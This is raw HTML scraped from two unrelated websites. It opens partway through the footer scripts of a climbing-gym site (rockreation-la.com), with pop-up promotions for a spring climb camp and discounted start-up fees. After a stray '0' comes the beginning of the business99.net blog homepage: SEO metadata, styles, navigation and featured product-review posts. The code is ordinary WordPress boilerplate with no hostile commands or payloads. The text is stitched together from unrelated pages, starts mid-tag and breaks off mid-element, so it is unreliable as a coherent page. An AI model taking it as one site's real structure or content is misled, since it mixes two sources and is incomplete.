src='https://rockreation-la.com/wp-content/themes/vigor/js/jquery.touchSwipe.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/isotope.pkgd.min.js'></script> <script type='text/javascript' src='//maps.googleapis.com/maps/api/js?key=AIzaSyDYAUVtODTjzA9jl52zfoCUlyA1mPyU_2o&#038;ver=5.1.1'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/themes/vigor/js/default_dynamic.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/themes/vigor/js/default.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/themes/vigor/js/custom_js.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/themes/vigor/js/TweenLite.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/themes/vigor/js/ScrollToPlugin.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/themes/vigor/js/smoothPageScroll.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/comment-reply.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/plugins/wp-spamshield/js/jscripts-ftr-min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-includes/js/wp-embed.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var icegram_pre_data = {"ajax_url":"https:\/\/rockreation-la.com\/wp-admin\/admin-ajax.php","post_obj":{"is_home":true,"page_id":20,"action":"display_messages","shortcodes":[],"cache_compatibility":"no","device":"laptop"}}; var icegram_data = {"messages":[{"post_title":"Spring Climb Camp","type":"action-bar","theme":"hello","headline":"Spring Climb Camp Sessions Open!","icon":"","message":"<p><span style=\"color: #ffff00;\">Single Day and 5-Day Week options<\/span><\/p>\n","animation":"no-anim","form_style":"style_0","form_layout":"bottom","form_bg_color":"","form_text_color":"","form_header":"","form_html_original":"","form_footer":"","label":"Info & Sign Up","link":"https:\/\/rockreation-la.com\/climb-camp\/","bg_color":"#016699","text_color":"#ffffff","cta_bg_color":"#3d5163","cta_text_color":"","position":"01","custom_css":"#ig_this_message .ig_headline{ \/* font-size: 3em !important; *\/ }","custom_js":"<script type=\"text\/javascript\"> \/* add your js code here *\/ <\/script>","id":"52098","delay_time":0,"retargeting":"","campaign_id":52097,"expiry_time":"","retargeting_clicked":"","expiry_time_clicked":""},{"post_title":"Join the Rockreation Family!","type":"messenger","theme":"canvas","headline":"","icon":"","message":"<hr \/>\n<h3 style=\"text-align: center;\"><span style=\"color: #ffff99;\">$50 Off Start-Up Fees<\/span><\/h3>\n<h3 style=\"text-align: center;\"><span style=\"color: #ffff99;\">For The<\/span><\/h3>\n<h3 style=\"text-align: center;\"><span style=\"color: #ffff99;\">Month of April<\/span><\/h3>\n<hr \/>\n<p>&nbsp;<\/p>\n","animation":"no-anim","form_style":"style_0","form_layout":"inline","form_bg_color":"","form_text_color":"","form_header":"","form_html_original":"","form_footer":"","label":"","link":"https:\/\/rockreation-la.com\/climbing-classes\/","use_theme_defaults":"yes","bg_color":"","text_color":"","cta_bg_color":"","cta_text_color":"","position":"22","use_custom_code":"yes","custom_css":"#ig_this_message {\r\n width: 40%;\r\n}\r\n#ig_this_message .ig_content{\r\n background-color: #01AAF6 !important;\r\n border: none;\r\n}\r\n#ig_this_message .ig_body{\r\n overflow-y: hidden;\r\n}\r\n#ig_this_message .ig_message{\r\n text-align: center; \r\n font-family: 'Roboto', sans-serif;\r\n color: #FFFFFF;\r\n line-height: 1.4;\r\n font-size: 1.1em;\r\n}\r\n#ig_this_message .ig_heading{\r\n font-size: 1.2em;\r\n line-height: 1.2em;\r\n font-weight: 600;\r\n margin-bottom: 0.6em;\r\n position: relative;\r\n}\r\n#ig_this_message .ig_heading:after{\r\n content: '';\r\n position: absolute;\r\n width: 60%;\r\n margin-left: 20%;\r\n left: 0;\r\n bottom: -0.3em;\r\n border-bottom: 3px solid #fff;\r\n}\r\n\r\n#ig_this_message .ig_btn_container{\r\n width: 100%;\r\n padding: 0.6em 0;\r\n}\r\n\r\n#ig_this_message .ig_btn_container > button{\r\n display: inline-block;\r\n width: 48%;\r\n font-size: 1em;\r\n border: 0;\r\n color: #FFFFFF;\r\n font-weight: 600;\r\n border-radius: 0;\r\n padding: 0.5em 0;\r\n height: 2.5em;\r\n}\r\n\r\n#ig_this_message button.ig_btn1 {\r\n background: none;\r\n background-color: #0071a5;\r\n border: 0;\r\n font-weight: 600;\r\n border-radius: 0;\r\n box-shadow: none;\r\n}\r\n#ig_this_message button.ig_btn2 {\r\n background: none;\r\n background-color: transparent;\r\n border: 2px solid #FFFFFF;\r\n margin-left: 2%;\r\n box-shadow: none;\r\n}\r\n\r\n#ig_this_message .ig_close:after {\r\n background-image: url(https:\/\/www.icegram.com\/gallery\/wp-content\/uploads\/2017\/07\/sprite_close_02_white_48.png);\r\n background-position: -258px center;\r\n}\r\n\r\n@media only screen and (max-width: 319px), (min-width: 320px) and (max-width: 359px), (min-width: 360px) and (max-width: 413px), (min-width: 414px) and (max-width: 643px), (min-width: 644px) and (max-width: 767px){\r\n#ig_this_message {\r\n width: 90%;\r\n font-size: .9em;\r\n }\r\n}\r\n@media only screen and (min-width: 768px) and (max-width: 992px), (min-width: 993px) and (max-width: 1023px) {\r\n#ig_this_message {\r\n width: 80%;\r\n}\r\n\r\n\/* google fonts *\/\r\n\r\n\/* cyrillic-ext *\/\r\n@font-face {\r\n font-family: 'Roboto';\r\n font-style: normal;\r\n font-weight: 400;\r\n src: local('Roboto'), local('Roboto-Regular'), url(https:\/\/fonts.gstatic.com\/s\/roboto\/v16\/ek4gzZ-GeXAPcSbHtCeQI_esZW2xOQ-xsNqO47m55DA.woff2) format('woff2');\r\n unicode-range: U+0460-052F, U+20B4, U+2DE0-2DFF, U+A640-A69F;\r\n}\r\n\/* cyrillic *\/\r\n@font-face {\r\n font-family: 'Roboto';\r\n font-style: normal;\r\n font-weight: 400;\r\n src: local('Roboto'), local('Roboto-Regular'), url(https:\/\/fonts.gstatic.com\/s\/roboto\/v16\/mErvLBYg_cXG3rLvUsKT_fesZW2xOQ-xsNqO47m55DA.woff2) format('woff2');\r\n unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;\r\n}\r\n\/* greek-ext *\/\r\n@font-face {\r\n font-family: 'Roboto';\r\n font-style: normal;\r\n font-weight: 400;\r\n src: local('Roboto'), local('Roboto-Regular'), url(https:\/\/fonts.gstatic.com\/s\/roboto\/v16\/-2n2p-_Y08sg57CNWQfKNvesZW2xOQ-xsNqO47m55DA.woff2) format('woff2');\r\n unicode-range: U+1F00-1FFF;\r\n}\r\n\/* greek *\/\r\n@font-face {\r\n font-family: 'Roboto';\r\n font-style: normal;\r\n font-weight: 400;\r\n src: local('Roboto'), local('Roboto-Regular'), url(https:\/\/fonts.gstatic.com\/s\/roboto\/v16\/u0TOpm082MNkS5K0Q4rhqvesZW2xOQ-xsNqO47m55DA.woff2) format('woff2');\r\n unicode-range: U+0370-03FF;\r\n}\r\n\/* vietnamese *\/\r\n@font-face {\r\n font-family: 'Roboto';\r\n font-style: normal;\r\n font-weight: 400;\r\n src: local('Roboto'), local('Roboto-Regular'), url(https:\/\/fonts.gstatic.com\/s\/roboto\/v16\/NdF9MtnOpLzo-noMoG0miPesZW2xOQ-xsNqO47m55DA.woff2) format('woff2');\r\n unicode-range: U+0102-0103, U+1EA0-1EF9, U+20AB;\r\n}\r\n\/* latin-ext *\/\r\n@font-face {\r\n font-family: 'Roboto';\r\n font-style: normal;\r\n font-weight: 400;\r\n src: local('Roboto'), local('Roboto-Regular'), url(https:\/\/fonts.gstatic.com\/s\/roboto\/v16\/Fcx7Wwv8OzT71A3E1XOAjvesZW2xOQ-xsNqO47m55DA.woff2) format('woff2');\r\n unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF;\r\n}\r\n\/* latin *\/\r\n@font-face {\r\n font-family: 'Roboto';\r\n font-style: normal;\r\n font-weight: 400;\r\n src: local('Roboto'), local('Roboto-Regular'), url(https:\/\/fonts.gstatic.com\/s\/roboto\/v16\/CWB0XYA8bzo0kSThX0UTuA.woff2) format('woff2');\r\n unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215;\r\n}","custom_js":"<script type=\"text\/javascript\"> \/* add your js code here *\/ <\/script>","id":"52426","delay_time":0,"retargeting":"","campaign_id":52425,"expiry_time":"","retargeting_clicked":"","expiry_time_clicked":""}],"ajax_url":"https:\/\/rockreation-la.com\/wp-admin\/admin-ajax.php","defaults":{"icon":"https:\/\/rockreation-la.com\/wp-content\/plugins\/icegram\/assets\/images\/icegram-logo-branding-64-grey.png","powered_by_logo":"","powered_by_text":""},"scripts":["https:\/\/rockreation-la.com\/wp-content\/plugins\/icegram\/assets\/js\/icegram.min.js?var=1.10.26"],"css":["https:\/\/rockreation-la.com\/wp-content\/plugins\/icegram\/assets\/css\/frontend.min.css?var=1.10.26","https:\/\/rockreation-la.com\/wp-content\/plugins\/icegram\/message-types\/action-bar\/themes\/action-bar.min.css?var=1.10.26","https:\/\/rockreation-la.com\/wp-content\/plugins\/icegram\/message-types\/messenger\/themes\/messenger.min.css?var=1.10.26"]}; /* ]]> */ </script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/plugins/icegram/assets/js/main.min.js'></script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Business99 - Guide to start a successful business</title> <!-- This site is optimized with the Yoast SEO plugin v10.0.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Business99 is a blog about business, how-to guides, ideas for small business, ideas to improve business, how to operate business successfully..."/> <link rel="canonical" href="https://www.business99.net/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Business99 - Guide to start a successful business" /> <meta property="og:description" content="Business99 is a blog about business, how-to guides, ideas for small business, ideas to improve business, how to operate business successfully..." /> <meta property="og:url" content="https://www.business99.net/" /> <meta property="og:site_name" content="Business 99" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://www.business99.net/#website","url":"https://www.business99.net/","name":"Business 99","potentialAction":{"@type":"SearchAction","target":"https://www.business99.net/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//assets.pinterest.com' /> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//platform-api.sharethis.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link href='https://fonts.gstatic.com' crossorigin rel='preconnect' /> <link rel="alternate" type="application/rss+xml" title="Business 99 &raquo; Feed" href="https://www.business99.net/feed/" /> <link rel="alternate" type="application/rss+xml" title="Business 99 &raquo; Comments Feed" href="https://www.business99.net/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.business99.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='pinterest-pin-it-button-plugin-styles-css' href='https://www.business99.net/wp-content/plugins/pinterest-pin-it-button/css/public.css?ver=2.1.0.1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://www.business99.net/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='AzonSereyboth-css' href='https://www.business99.net/wp-content/plugins/AzonSereyboth/zonstyle.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='basepress-style-css' href='https://www.business99.net/wp-content/themes/basepress/style.css?ver=1.3.0' type='text/css' media='all' /> <style id='basepress-style-inline-css' type='text/css'> body, .sidebar { color: #333333; } .entry-footer, .entry-footer > span {color: #979797} h1, h2, h3, h4, h5 ,h6, .entry-title a, .sidebar .widget-title { color: #333333; } a, .sidebar a, .wp-caption .wp-caption-text { color: #025FB0; } a:hover, .sidebar a:hover, .entry-title a:hover { color: #004697; } .back-to-top { background: #025FB0; } .site-footer { background: #0a0a0a; } .site-footer, .site-footer #wp-calendar caption, .site-info { color: #666666; } .site-footer h1, .site-footer h2, .site-footer h3, .site-footer h4, .site-footer h5, .site-footer h6, .site-footer .widget-title { color: #ffffff; } .footer-navigation .footer-menu li a { color: #737373; } </style> <link rel='stylesheet' id='supersport-pro-css' href='https://www.business99.net/wp-content/plugins/supersport-pro/assets/css/supersport-pro.css?ver=1.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='jssocials-css' href='https://www.business99.net/wp-content/plugins/supersport-pro/assets/css/jssocials.css?ver=1.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='jssocials-theme-flat-css' href='https://www.business99.net/wp-content/plugins/supersport-pro/assets/css/flat?ver=1.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='toc-screen-css' href='https://www.business99.net/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=1509' type='text/css' media='all' /> <link rel='stylesheet' id='basepress-fonts-css' href='https://fonts.googleapis.com/css?family=Roboto|Roboto+Slab:400,700' type='text/css' media='all' /> <link rel='stylesheet' id='tablepress-default-css' href='https://www.business99.net/wp-content/plugins/tablepress/css/default.min.css?ver=1.9.2' type='text/css' media='all' /> <link rel='stylesheet' id='basepress-child-style-css' href='https://www.business99.net/wp-content/themes/supersport-theme/style.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://www.business99.net/wp-content/plugins/jetpack/css/jetpack.css?ver=7.0.1' type='text/css' media='all' /> <script>if (document.location.protocol != "https:") {document.location = document.URL.replace(/^http:/i, "https:");}</script><script type='text/javascript' src='https://www.business99.net/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.business99.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js#product=ga&#038;property=5a9240e26a313700133770b0'></script> <link rel='https://api.w.org/' href='https://www.business99.net/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.business99.net/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.business99.net/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel='shortlink' href='https://wp.me/Paioxx-1KC' /> <link rel="alternate" type="application/json+oembed" href="https://www.business99.net/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.business99.net%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.business99.net/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.business99.net%2F&#038;format=xml" /> <script type="text/javascript" async defer data-pin-color="red" data-pin-hover="true" src="https://www.business99.net/wp-content/plugins/pinterest-pin-it-button-on-image-hover-and-post/js/pinit.js"></script> <script> </script> <link rel='stylesheet' id='themecountry-awesome-font-css' href='https://themecountry.com/wp-content/themes/themecountry2/css/font-awesome.min.css?ver=4.9.2' type='text/css' media='all' /> <meta name="msvalidate.01" content="A2A1E2BA071B42771EBF4ED317A8FE04" /> <!-- Google Webmaster Tools plugin for WordPress --> <meta name="google-site-verification" content="Q_PdzazJPoEAKHjmrhBpQHz9wLHHOv1PGmI3y6OXJ8M" /> <meta name="verifyownership" content="33281cda3a0a3557a4dfd946142c957e" /> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <link rel='dns-prefetch' href='//i0.wp.com'/> <link rel='dns-prefetch' href='//i1.wp.com'/> <link rel='dns-prefetch' href='//i2.wp.com'/> <link rel='dns-prefetch' href='//widgets.wp.com'/> <link rel='dns-prefetch' href='//s0.wp.com'/> <link rel='dns-prefetch' href='//0.gravatar.com'/> <link rel='dns-prefetch' href='//1.gravatar.com'/> <link rel='dns-prefetch' href='//2.gravatar.com'/> <style type='text/css'>img#wpstats{display:none}</style> <style type="text/css"> /* If html does not have either class, do not show lazy loaded images. */ html:not( .jetpack-lazy-images-js-enabled ):not( .js ) .jetpack-lazy-image { display: none; } </style> <script> document.documentElement.classList.add( 'jetpack-lazy-images-js-enabled' ); </script> <link rel="icon" href="https://i1.wp.com/www.business99.net/wp-content/uploads/2018/12/business99dotcom.png?fit=32%2C32&#038;ssl=1" sizes="32x32" /> <link rel="icon" href="https://i1.wp.com/www.business99.net/wp-content/uploads/2018/12/business99dotcom.png?fit=192%2C192&#038;ssl=1" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://i1.wp.com/www.business99.net/wp-content/uploads/2018/12/business99dotcom.png?fit=180%2C180&#038;ssl=1" /> <meta name="msapplication-TileImage" content="https://i1.wp.com/www.business99.net/wp-content/uploads/2018/12/business99dotcom.png?fit=270%2C270&#038;ssl=1" /> <style type="text/css" id="wp-custom-css"> a.amz-btn-txt { color: #FFFFFF; font-size: 22px; font-weight: 900; background: #FA5B0F; padding: 15px 20px; text-align: center; display:inline-block; margin: 15px 0px; } a.amz-btn-txt:visited{ color: #FFFFFF; } a.amz-btn-txt:hover{ text-decoration: none; } </style> <style id="kirki-inline-styles">body{font-family:Roboto, Helvetica, Arial, sans-serif;font-size:16px;font-weight:400;line-height:1.4;}.site-title a,h1,h2,h3,h4,h5,h6{font-family:"Roboto Slab", Georgia, serif;font-weight:700;}.site-header .main-header{background-color:#025fb0;}.site-description, .site-title a{color:#ffffff;}.main-navigation ul li a, .social-icons-menu a:before, .main-navigation ul ul li a{color:#ffffff;}.main-navigation ul li:hover > a{color:#3fa6ff;}.main-navigation ul ul{background-color:#2b7cc1;}@font-face{font-display:swap;font-family:'Roboto';font-style:normal;font-weight:400;src:local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v19/KFOmCnqEu92Fr1Me5g.woff) format('woff');}@font-face{font-display:swap;font-family:'Roboto Slab';font-style:normal;font-weight:700;src:local('Roboto Slab Bold'), local('RobotoSlab-Bold'), url(https://fonts.gstatic.com/s/robotoslab/v8/BngRUXZYTXPIvIBgJJSb6u92w4CC.woff) format('woff');}</style></head> <body data-rsssl=1 class="home page-template page-template-template-homepage page-template-template-homepage-php page page-id-6734 wp-custom-logo top-post-thumbnail group-blog no-wc-breadcrumb right-sidebar"> <div id="page" class="site"> <header id="masthead" class="site-header" role="banner"> <div class="main-header"> <div class="container"> <a class="skip-link screen-reader-text" href="#site-navigation">Skip to navigation</a> <a class="skip-link screen-reader-text" href="#content">Skip to content</a> <div id="logo" class="site-branding clearfix"> <a href="https://www.business99.net/" class="custom-logo-link" rel="home" itemprop="url"><img width="225" height="129" src="https://i0.wp.com/www.business99.net/wp-content/uploads/2018/02/business99dotcom.png?fit=225%2C129&amp;ssl=1" class="custom-logo jetpack-lazy-image" alt="Business 99" itemprop="logo" data-attachment-id="6740" data-permalink="https://www.business99.net/business99dotcom/" data-orig-file="https://i0.wp.com/www.business99.net/wp-content/uploads/2018/02/business99dotcom.png?fit=225%2C129&amp;ssl=1" data-orig-size="225,129" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="business99dotcom" data-image-description="" data-medium-file="https://i0.wp.com/www.business99.net/wp-content/uploads/2018/02/business99dotcom.png?fit=225%2C129&amp;ssl=1" data-large-file="https://i0.wp.com/www.business99.net/wp-content/uploads/2018/02/business99dotcom.png?fit=225%2C129&amp;ssl=1" data-lazy-src="https://i0.wp.com/www.business99.net/wp-content/uploads/2018/02/business99dotcom.png?fit=225%2C129&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a> </div> <div class="main-navigation"> <nav id="site-navigation" class="main-nav" role="navigation"> <span class="menu-toggle" aria-controls="primary-menu" aria-expanded="false">Main Navigation</span> <ul id="primary-navigation" class="main-navigation-menu"><li id="menu-item-6299" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-6299"><a href="https://www.business99.net/" aria-current="page">Home</a></li> <li id="menu-item-6292" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6292"><a href="https://www.business99.net/category/business/">Business</a></li> <li id="menu-item-6293" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6293"><a href="https://www.business99.net/category/electronics-computers/">Electronics &#038; Computers</a></li> <li id="menu-item-6294" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6294"><a href="https://www.business99.net/category/home-kitchen/">Home &#038; Kitchen</a></li> <li id="menu-item-6295" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6295"><a href="https://www.business99.net/category/sports-outdoors/">Sports &#038; Outdoors</a></li> <li id="menu-item-6296" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6296"><a href="https://www.business99.net/category/health-beauty/">Health &#038; Beauty</a></li> </ul> </nav><!-- #site-navigation --> <div class="top-search"> <a id="trigger-overlay"> <i class="fa fa-search"></i> </a> <div class="overlay overlay-slideleft"> <div class="search-row"> <a ahref="#" class="overlay-close"><i class="fa fa-times"></i></a> <form method="get" id="searchform" class="search-form" action="https://www.business99.net/" _lpchecked="1"> <input type="text" name="s" id="s" class="search-field" value="" placeholder="Search ..." /> </form> </div> </div> </div><!-- .top-search --> </div> </div> <!-- .container --> </div> <div id="header-catcher"></div> </header><!-- #masthead --> <div id="content" class="site-content"> <div class="container"> <div id="primary" class="content-area"> <main id="main" class="site-main" role="main"> <div id="magazine-homepage-featured" class="widget-area magazine-homepage clearfix"><div id="magazine-posts-featured-2" class="widget magazine_posts_featured"> <div class="magazine-posts-featured widget-magazine-posts clearfix"> <div class="gamma widget-title">Featured</div> <div class="widget-magazine-posts-content"> <div class="magazine-posts-featured clearfix"> <article id="post-4831" class="mid-large-post clearfix post-4831 post type-post status-publish format-standard has-post-thumbnail hentry category-electronics-computers tag-drawing tag-tablet"> <div class="post-thumbnail"> <a href="https://www.business99.net/drawing-tablet/" rel="bookmark"> <img width="365" height="300" src="https://i2.wp.com/www.business99.net/wp-content/uploads/2017/09/drawing-tablet.jpg?resize=365%2C300&amp;ssl=1" class="attachment-supersport-post-featured size-supersport-post-featured wp-post-image jetpack-lazy-image" alt="" data-attachment-id="5105" data-permalink="https://www.business99.net/drawing-tablet/drawing-tablet/" data-orig-file="https://i2.wp.com/www.business99.net/wp-content/uploads/2017/09/drawing-tablet.jpg?fit=650%2C300&amp;ssl=1" data-orig-size="650,300" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="drawing tablet" data-image-description="" data-medium-file="https://i2.wp.com/www.business99.net/wp-content/uploads/2017/09/drawing-tablet.jpg?fit=300%2C138&amp;ssl=1" data-large-file="https://i2.wp.com/www.business99.net/wp-content/uploads/2017/09/drawing-tablet.jpg?fit=640%2C295&amp;ssl=1" data-lazy-srcset="https://i2.wp.com/www.business99.net/wp-content/uploads/2017/09/drawing-tablet.jpg?zoom=2&amp;resize=365%2C300&amp;ssl=1 730w, https://i2.wp.com/www.business99.net/wp-content/uploads/2017/09/drawing-tablet.jpg?zoom=3&amp;resize=365%2C300&amp;ssl=1 1095w" data-lazy-sizes="(max-width: 365px) 100vw, 365px" data-lazy-src="https://i2.wp.com/www.business99.net/wp-content/uploads/2017/09/drawing-tablet.jpg?resize=365%2C300&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /> </a> </div> <div class="posts-info-container"> <header class="entry-header"> <div class="info-category"><span class="con-cat"><a href="https://www.business99.net/category/electronics-computers/" rel="category tag">Electronics &amp; Computers</a></div> <h2 class="entry-title"><a href="https://www.business99.net/drawing-tablet/" rel="bookmark">Best Drawing Tablet in 2019</a></h2> </header><!-- .entry-header --> </div> </article> <div class="mid-medium-posts clearfix"> <article id="post-5939" class="mid-medium-post clearfix post-5939 post type-post status-publish format-standard has-post-thumbnail hentry category-electronics-computers tag-laminating tag-machines" > <div class="post-thumbnail"> <a href="https://www.business99.net/laminating-machines/" rel="bookmark"> <img width="386" height="258" src="https://i0.wp.com/www.business99.net/wp-content/uploads/2017/11/Laminating-Machines.jpg?resize=386%2C258&amp;ssl=1" class="attachment-supersport-post-featured-grid size-supersport-post-featured-grid wp-post-image jetpack-lazy-image" alt="Laminating Machines" data-attachment-id="6268" data-permalink="https://www.business99.net/laminating-machines/laminating-machines-2/" data-orig-file="https://i0.wp.com/www.business99.net/wp-content/uploads/2017/11/Laminating-Machines.jpg?fit=628%2C275&amp;ssl=1" data-orig-size="628,275" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Laminating Machines" data-image-description="" data-medium-file="https://i0.wp.com/www.business99.net/wp-content/uploads/2017/11/Laminating-Machines.jpg?fit=300%2C131&amp;ssl=1" data-large-file="https://i0.wp.com/www.business99.net/wp-content/uploads/2017/11/Laminating-Machines.jpg?fit=628%2C275&amp;ssl=1" data-lazy-src="https://i0.wp.com/www.business99.net/wp-content/uploads/2017/11/Laminating-Machines.jpg?resize=386%2C258&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /> </a> </div> <div class="posts-info-container medium-post-content"> <header class="entry-header"> <div class="info-category"><span class="con-cat"><a href="https://www.business99.net/category/electronics-computers/" rel="category tag">Electronics &amp; Computers</a></div> <h2 class="entry-title"><a href="https://www.business99.net/laminating-machines/" rel="bookmark">Best Laminating Machines | Get Your Photo Laminate Right Now</a></h2> </header><!-- .entry-header --> </div> </article> <article id="post-4890" class="mid-medium-post clearfix post-4890 post type-post status-publish format-standard has-post-thumbnail hentry category-electronics-computers tag-laptops tag-mini" > 